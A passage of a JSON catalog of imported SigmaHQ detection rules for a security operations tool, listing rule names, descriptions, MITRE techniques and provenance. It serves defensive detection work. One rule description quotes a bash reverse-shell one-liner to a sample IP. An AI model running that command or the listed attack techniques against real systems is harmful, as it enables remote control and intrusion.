"categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-groups-or-users-enumeration-using-powershell-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" } }, { "id": "sigmahq-sigma-815cd91b-7dbc-4247-841a-d7dd1392b0a8", "type": "detection", "name": "Sysmon Configuration Error", "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification_error.yml" } }, { "id": "sigmahq-sigma-817f252c-5143-4dae-b418-48c3e9f63728", "type": "detection", "name": "Windows Recall Feature Enabled Via Reg.EXE", "description": "Detects the enabling of the Windows Recall feature via registry manipulation.\nWindows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" value, or setting it to 0.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "817f252c-5143-4dae-b418-48c3e9f63728", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-818f7b24-0fba-4c49-a073-8b755573b9c7", "type": "detection", "name": "Linux Webshell Indicators", "description": "Detects suspicious sub processes of web server processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-webshell-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "818f7b24-0fba-4c49-a073-8b755573b9c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" } }, { "id": "sigmahq-sigma-818fee0c-e0ec-4e45-824e-83e4817b0887", "type": "detection", "name": "Azure Kubernetes Sensitive Role Access", "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-sensitive-role-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "818fee0c-e0ec-4e45-824e-83e4817b0887", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml" } }, { "id": "sigmahq-sigma-81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "type": "detection", "name": "Add Insecure Download Source To Winget", "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-insecure-download-source-to-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" } }, { "id": "sigmahq-sigma-81bcb81b-5b1f-474b-b373-52c871aaa7b1", "type": "detection", "name": "Stop Windows Service Via Sc.EXE", "description": "Detects the stopping of a Windows service via the \"sc.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_stop_service.yml" } }, { "id": "sigmahq-sigma-81ebd28b-9607-4478-bf06-974ed9d53ed7", "type": "detection", "name": "Potential Application Whitelisting Bypass via Dnx.EXE", "description": "Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.\nAttackers might abuse this in order to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-application-whitelisting-bypass-via-dnx-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml" } }, { "id": "sigmahq-sigma-8202070f-edeb-4d31-a010-a26c72ac5600", "type": "detection", "name": "Suspicious Process By Web Server Process", "description": "Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-by-web-server-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8202070f-edeb-4d31-a010-a26c72ac5600", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml" } }, { "id": "sigmahq-sigma-8218c875-90b9-42e2-b60d-0b0069816d10", "type": "detection", "name": "PowerShell Script Execution Policy Enabled", "description": "Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-execution-policy-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8218c875-90b9-42e2-b60d-0b0069816d10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml" } }, { "id": "sigmahq-sigma-821b4dc3-1295-41e7-b157-39ab212dd6bd", "type": "detection", "name": "Sign-In From Malware Infected IP", "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-in-from-malware-infected-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "821b4dc3-1295-41e7-b157-39ab212dd6bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" } }, { "id": "sigmahq-sigma-821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "type": "detection", "name": "Root Account Enable Via Dsenableroot", "description": "Detects attempts to enable the root account via \"dsenableroot\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1078.001", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-account-enable-via-dsenableroot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" } }, { "id": "sigmahq-sigma-82343930-652f-43f5-ab70-2ee9fdd6d5e9", "type": "detection", "name": "Potential ShellDispatch.DLL Functionality Abuse", "description": "Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via \"ShellExecute\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-shelldispatch-dll-functionality-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82343930-652f-43f5-ab70-2ee9fdd6d5e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml" } }, { "id": "sigmahq-sigma-82880171-b475-4201-b811-e9c826cd5eaa", "type": "detection", "name": "Exports Critical Registry Keys To a File", "description": "Detects the export of a crital Registry key to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-critical-registry-keys-to-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82880171-b475-4201-b811-e9c826cd5eaa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" } }, { "id": "sigmahq-sigma-8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "type": "detection", "name": "Unsigned Binary Loaded From Suspicious Location", "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-binary-loaded-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" } }, { "id": "sigmahq-sigma-828af599-4c53-4ed2-ba4a-a9f835c434ea", "type": "detection", "name": "Fax Service DLL Search Order Hijack", "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fax-service-dll-search-order-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ualapi.yml" } }, { "id": "sigmahq-sigma-829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "type": "detection", "name": "Microsoft Office DLL Sideload", "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-office-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_office_dlls.yml" } }, { "id": "sigmahq-sigma-82a6714f-4899-4f16-9c1e-9a333544d4c3", "type": "detection", "name": "File In Suspicious Location Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-in-suspicious-location-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82a6714f-4899-4f16-9c1e-9a333544d4c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" } }, { "id": "sigmahq-sigma-833ef470-fa01-4631-a79b-6f291c9ac498", "type": "detection", "name": "Add Debugger Entry To Hangs Key For Persistence", "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-debugger-entry-to-hangs-key-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "833ef470-fa01-4631-a79b-6f291c9ac498", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" } }, { "id": "sigmahq-sigma-8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "type": "detection", "name": "Potential Discovery Activity Using Find - Linux", "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-using-find-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" } }, { "id": "sigmahq-sigma-835747f1-9329-40b5-9cc3-97d465754ce6", "type": "detection", "name": "Azure Application Security Group Modified or Deleted", "description": "Identifies when a application security group is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-security-group-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "835747f1-9329-40b5-9cc3-97d465754ce6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "type": "detection", "name": "Uncommon Child Process Of Setres.EXE", "description": "Detects uncommon child process of Setres.EXE.\nSetres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\nIt can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-setres-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-8366030e-7216-476b-9927-271d79f13cf3", "type": "detection", "name": "Azure Unusual Authentication Interruption", "description": "Detects when there is a interruption in the authentication process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-unusual-authentication-interruption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8366030e-7216-476b-9927-271d79f13cf3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml" } }, { "id": "sigmahq-sigma-83809e84-4475-4b69-bc3e-4aad8568612f", "type": "detection", "name": "MSExchange Transport Agent Installation", "description": "Detects the Installation of a Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msexchange-transport-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83809e84-4475-4b69-bc3e-4aad8568612f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml" } }, { "id": "sigmahq-sigma-83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "type": "detection", "name": "Suspicious Encoded Scripts in a WMI Consumer", "description": "Detects suspicious encoded payloads in WMI Event Consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-scripts-in-a-wmi-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" } }, { "id": "sigmahq-sigma-8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "type": "detection", "name": "Query Tor Onion Address - DNS Client", "description": "Detects DNS resolution of an .onion address related to Tor routing networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/query-tor-onion-address-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml" } }, { "id": "sigmahq-sigma-83865853-59aa-449e-9600-74b9d89a6d6e", "type": "detection", "name": "Audio Capture via SoundRecorder", "description": "Detect attacker collecting audio via SoundRecorder application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture-via-soundrecorder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83865853-59aa-449e-9600-74b9d89a6d6e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml" } }, { "id": "sigmahq-sigma-83c161b6-ca67-4f33-8ad0-644a0737cf07", "type": "detection", "name": "Suspicious Application Installed", "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-application-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" } }, { "id": "sigmahq-sigma-83c17918-746e-4bd9-920b-8e098bf88c23", "type": "detection", "name": "Azure Network Firewall Policy Modified or Deleted", "description": "Identifies when a Firewall Policy is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-network-firewall-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83c17918-746e-4bd9-920b-8e098bf88c23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "type": "detection", "name": "Linux Reverse Shell Indicator", "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-reverse-shell-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" } }, { "id": "sigmahq-sigma-84232095-ecca-4015-b0d7-7726507ee793", "type": "detection", "name": "Suspicious DLL Loaded via CertOC.EXE", "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dll-loaded-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84232095-ecca-4015-b0d7-7726507ee793", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" } }, { "id": "sigmahq-sigma-843544a7-56e0-4dcc-a44f-5cc266dd97d6", "type": "detection", "name": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": 